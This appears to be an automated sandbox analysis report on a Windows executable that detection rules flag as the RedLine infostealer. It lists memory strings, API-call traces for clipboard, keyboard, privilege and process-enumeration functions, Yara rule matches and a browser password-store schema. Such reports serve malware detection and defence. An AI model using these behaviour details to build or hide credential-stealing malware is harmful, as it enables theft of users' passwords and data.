Source: tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpE220.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpE1FE.tmp.3.dr, tmpE241.tmp.3.dr, tmpE230.tmp.3.dr, tmpA8A9.tmp.3.dr, tmpE20F.tmp.3.dr, tmp1AF5.tmp.3.dr, tmpE1DC.tmp.3.dr, tmpA8BA.tmp.3.dr, tmpA8A8.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_0084425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,

1_2_0084425A

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_00844458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_00844458

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

1_2_0084425A

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_00830219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

1_2_00830219

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_0085CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

1_2_0085CDAC

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.YPSvIjQCzd.exe.1500000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 1.2.YPSvIjQCzd.exe.1500000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: YPSvIjQCzd.exe PID: 7568, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7632, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: This is a third-party compiled AutoIt script.	1_2_007D3B4C
Source: YPSvIjQCzd.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: YPSvIjQCzd.exe, 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6e757dd8-8
Source: YPSvIjQCzd.exe, 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8ced724c-0

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007D3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	1_2_007D3633
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085C220 NtdllDialogWndProc_W,	1_2_0085C220
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	1_2_0085C27C
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	1_2_0085C49C
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	1_2_0085C788
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	1_2_0085C8EE
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085C86D SendMessageW,NtdllDialogWndProc_W,	1_2_0085C86D
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085CBAE NtdllDialogWndProc_W,	1_2_0085CBAE
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085CBF9 NtdllDialogWndProc_W,	1_2_0085CBF9
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085CB50 NtdllDialogWndProc_W,	1_2_0085CB50
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085CB7F NtdllDialogWndProc_W,	1_2_0085CB7F
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085CC2E ClientToScreen,NtdllDialogWndProc_W,	1_2_0085CC2E
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	1_2_0085CDAC
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085CD6C GetWindowLongW,NtdllDialogWndProc_W,	1_2_0085CD6C
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007D1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	1_2_007D1290
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007D1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74E4C8D0,NtdllDialogWndProc_W,	1_2_007D1287
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007D167D NtdllDialogWndProc_W,	1_2_007D167D
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085D6C6 NtdllDialogWndProc_W,	1_2_0085D6C6
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007D16DE GetParent,NtdllDialogWndProc_W,	1_2_007D16DE
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007D16B5 NtdllDialogWndProc_W,	1_2_007D16B5
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	1_2_0085D74C
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007D189B NtdllDialogWndProc_W,	1_2_007D189B
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085DA9A NtdllDialogWndProc_W,	1_2_0085DA9A
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085BF4D NtdllDialogWndProc_W,CallWindowProcW,	1_2_0085BF4D

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_008340B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

1_2_008340B1

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_00828858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74FD5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

1_2_00828858

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_0083545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

1_2_0083545F

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007DE800	1_2_007DE800
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007FDBB5	1_2_007FDBB5
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007DE060	1_2_007DE060
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0085804A	1_2_0085804A
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007E4140	1_2_007E4140
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007F2405	1_2_007F2405
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00806522	1_2_00806522
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00850665	1_2_00850665
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0080267E	1_2_0080267E
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007E6843	1_2_007E6843
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007F283A	1_2_007F283A
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_008089DF	1_2_008089DF
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00806A94	1_2_00806A94
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00850AE2	1_2_00850AE2
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007E8A0E	1_2_007E8A0E
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_0082EB07	1_2_0082EB07
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00838B13	1_2_00838B13
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007FCD61	1_2_007FCD61
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00807006	1_2_00807006
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007E710E	1_2_007E710E
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007E3190	1_2_007E3190
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007D1287	1_2_007D1287
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007F33C7	1_2_007F33C7
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007FF419	1_2_007FF419
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007F16C4	1_2_007F16C4
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007E5680	1_2_007E5680
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007F78D3	1_2_007F78D3
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007E58C0	1_2_007E58C0
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007F1BB8	1_2_007F1BB8
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00809D05	1_2_00809D05
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007DFE40	1_2_007DFE40
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007FBFE6	1_2_007FBFE6
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_007F1FD0	1_2_007F1FD0
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_014F3600	1_2_014F3600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0123E7B0	3_2_0123E7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0123DC90	3_2_0123DC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_073C67D8	3_2_073C67D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_073C3F50	3_2_073C3F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_073CC43C	3_2_073CC43C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_073C6FF8	3_2_073C6FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_073C6FE8	3_2_073C6FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_073CEC28	3_2_073CEC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_073CEC18	3_2_073CEC18

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: String function: 007D7F41 appears 35 times
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: String function: 007F8B40 appears 42 times
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: String function: 007F0D27 appears 70 times

Source: YPSvIjQCzd.exe

Static PE information: Resource name: RT_STRING type: ARC archive data, dynamic LZW

Source: YPSvIjQCzd.exe, 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs YPSvIjQCzd.exe
Source: YPSvIjQCzd.exe, 00000001.00000003.1335519066.0000000003F13000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs YPSvIjQCzd.exe
Source: YPSvIjQCzd.exe, 00000001.00000003.1335239082.00000000040BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs YPSvIjQCzd.exe

Source: YPSvIjQCzd.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 1.2.YPSvIjQCzd.exe.1500000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.YPSvIjQCzd.exe.1500000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 1.2.YPSvIjQCzd.exe.1500000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: YPSvIjQCzd.exe PID: 7568, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7632, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/47@1/1

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_0083A2D5 GetLastError,FormatMessageW,

1_2_0083A2D5

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00828713 AdjustTokenPrivileges,CloseHandle,		1_2_00828713
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Code function: 1_2_00828CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		1_2_00828CC3

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_0083B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

1_2_0083B59E

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_0084F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_0084F121

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_007D4FE9 FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_007D4FE9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

File created: C:\Users\user~1\AppData\Local\Temp\autCDB.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp1B28.tmp.3.dr, tmpA876.tmp.3.dr, tmp1B17.tmp.3.dr, tmp1B18.tmp.3.dr, tmpA877.tmp.3.dr, tmpA887.tmp.3.dr, tmpA888.tmp.3.dr, tmp1B3A.tmp.3.dr, tmpA854.tmp.3.dr, tmpA855.tmp.3.dr, tmp1B29.tmp.3.dr, tmp1B06.tmp.3.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: YPSvIjQCzd.exe

ReversingLabs: Detection: 40%

Source: unknown	Process created: C:\Users\user\Desktop\YPSvIjQCzd.exe "C:\Users\user\Desktop\YPSvIjQCzd.exe"
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\YPSvIjQCzd.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\YPSvIjQCzd.exe"	Jump to behavior

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YPSvIjQCzd.exe	Section loaded: wldp.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: wntdll.pdbUGP source: YPSvIjQCzd.exe, 00000001.00000003.1336388320.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, YPSvIjQCzd.exe, 00000001.00000003.1335705699.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: YPSvIjQCzd.exe, 00000001.00000003.1336388320.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, YPSvIjQCzd.exe, 00000001.00000003.1335705699.0000000003F90000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\YPSvIjQCzd.exe

Code function: 1_2_008EF090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_008EF090

